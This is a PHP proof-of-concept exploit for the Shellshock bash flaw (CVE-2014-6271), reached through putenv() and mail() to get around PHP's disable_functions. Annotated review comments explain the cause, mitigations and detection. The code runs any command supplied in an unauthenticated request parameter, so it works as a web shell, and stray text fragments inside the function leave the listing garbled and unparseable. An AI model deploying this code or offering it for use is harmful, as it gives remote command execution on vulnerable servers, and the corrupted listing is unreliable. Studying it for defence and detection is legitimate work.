# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
# Google Dork: none
# Date : 10/31/2014
# Exploit Author: Ryan King (Starfall)
# Vendor Homepage: http:
# Software Link: http:
# Version: 5.* (tested on 5.6.2)
# Tested on: Debian 7 and CentOS 5 and 6
# CVE: CVE-2014-6271
<?php
/**
 * Proof of concept for CVE-2014-6271 (Shellshock) reached through PHP's mail().
 *
 * What the visible code does: it checks that /bin/sh is a symlink whose target
 * contains "bash", creates a temporary file in the current directory, exports an
 * environment variable whose value begins with bash function-definition syntax
 * followed by $cmd (output redirected to the temporary file), and then calls
 * mail(). It finally reads the temporary file back, deletes it and returns its
 * contents.
 *
 * NOTE(review): the bare fragments "mail.c:283", "whose names / that / empty ,"
 * and "send any mail" look like remnants of the author's comments whose comment
 * markers were lost in extraction; as printed, this listing does not parse.
 *
 * Defensive reading:
 *  - Root cause is the unpatched bash parser, which runs text that trails a
 *    function definition imported from the environment. The fix for this CVE is
 *    a patched bash; a /bin/sh that is not bash takes the "Not vuln" branch here.
 *  - The page title frames this as a disable_functions bypass: no exec-style PHP
 *    function is called, only putenv() and mail(). Hosts that list exec-style
 *    functions in disable_functions but leave these two enabled are the case the
 *    title describes; disabling putenv()/mail() where unused closes this path.
 *  - Detection ideas: environment values starting with "() {" in child
 *    processes of the PHP worker, a shell spawned by the web server user around
 *    a mail() call, and short-lived "data*" files created by tempnam() in the
 *    script directory.
 *
 * @param string $cmd Text interpolated unescaped into the environment value.
 * @return string Captured output, or one of the two fixed status strings below.
 */
function shellshock( $cmd ) {
mail.c:283
// Only proceed when /bin/sh resolves to bash. readlink() yields false when the
// path is not a symlink, and the loose != FALSE comparison covers that case.
if ( strstr ( readlink ( "/bin/sh" ), "bash" ) != FALSE) {
// Scratch file in the current working directory, used to capture output.
$tmp = tempnam( "." , "data" );
// The variable name PHP_LOL is arbitrary; what matters is the "() {" prefix of
// the value, which a vulnerable bash treats as an imported function definition.
putenv( "PHP_LOL=() { x; }; $cmd >$tmp 2>&1" );
whose names
that
empty ,
// The fifth mail() argument is passed on to the sendmail binary. "-bv" is
// presumably chosen so that no message is actually sent (address-verify mode);
// confirm against the local MTA.
mail( "a@127.0.0.1" , "" , "" , "" , "-bv" );
send any mail
}
else return "Not vuln (not bash)" ;
// "@" suppresses the warning raised when the scratch file is missing or unreadable.
$output = @ file_get_contents ( $tmp );
@unlink( $tmp );
// Empty output is ambiguous: the command may have printed nothing, or bash may
// already be patched.
if ( $output != "" ) return $output ;
else return "No output, or not vuln." ;
}
// Entry point: the raw "cmd" request parameter is handed to shellshock() with
// no authentication or validation, so a file like this in a web root behaves as
// a web shell and should be treated as an indicator of compromise. The return
// value is not echoed in this listing.
shellshock( $_REQUEST [ "cmd" ]);
?>